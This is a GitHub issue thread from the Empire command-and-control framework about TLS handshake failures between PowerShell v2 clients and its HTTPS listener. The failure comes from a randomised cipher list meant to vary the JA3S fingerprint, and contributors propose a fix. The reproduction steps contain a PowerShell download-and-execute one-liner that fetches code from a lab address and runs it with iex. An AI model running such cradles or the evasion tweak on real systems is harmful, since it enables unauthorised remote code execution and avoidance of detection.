### ISSUE TITLE
[BUG]Powershell version 2 TLS Handshake failure

### ISSUE THREAD

**Issue by tyraniter** [BC-SECURITY/Empire#155]
**Empire Version**
- Empire 3.x

**OS Information (Linux flavor, Python version)**
- OS: Ubuntu1804
- Python: 2.7

**Describe the bug**
When using powershell client on Windows 7 on which the default version of powershell and dotnet is 2 to connect to a https listener , there will be an "HandShake Failure"
![image](https://user-images.githubusercontent.com/6822883/78636468-fa8d7680-78da-11ea-8eb7-a5df62762c30.png)

**To Reproduce**
1. Start a https listener
2. Run script in powershell terminal:

> powershell -version 2
> $a=new-object net.webclient;
> $a.downloadstring('https://192.168.116.1:9999')|iex;

3. See error
![image](https://user-images.githubusercontent.com/6822883/78636562-2872bb00-78db-11ea-8c55-48bb87caa0a9.png)

**Expected behavior**
In default status, windows 7 only supports TLS1.0 and in lib/listeners/http.py,most of the following cipher suite is only supported after TLS1.2.If the random function return a cipher suite which TLS1.0 does not support,"HandShake Failure".

> cipherlist = ["ECDHE-RSA-AES256-GCM-SHA384", "ECDHE-RSA-AES128-GCM-SHA256", "ECDHE-RSA-AES256-SHA384","ECDHE-RSA-AES256-SHA", "AES256-SHA256", "AES128-SHA256"]
> selectciph = random.choice(cipherlist)
> context.set_ciphers(selectciph)

This list is added in #27 for "randomized JA3S signature". The python ssl.set_ciphers function can only be passed a string but not a list as parameter.Maybe we can use TLS1.0 cipher suites only for compatibility? 
**Screenshots**
N/A

**Additional context**
N/A

**Comment by tyraniter** [comment]
Maybe we can do like this:

> cipherlist_1 = random.choice(["ECDHE-ECDSA-AES256-SHA","ECDHE-ECDSA-AES256-SHA"])
> cipherlist_12 = random.choice(["ECDHE-RSA-AES256-GCM-SHA384", "ECDHE-RSA-AES128-GCM-SHA256", "ECDHE-RSA-AES256-SHA384", "AES256-SHA256", "AES128-SHA256"])
> context.set_ciphers(cipherlist_1+':'+cipherlist_12)

**Comment by Hubbl3** [comment]
@tyraniter that's a good idea. I will work on fixing this for the next bug fix release or you can submit a PR.

**Comment by tyraniter** [comment]
> @tyraniter that's a good idea. I will work on fixing this for the next bug fix release or you can submit a PR.

Let me submit a PR

**Comment by Cx01N** [comment]
Fix added to v3.1.5
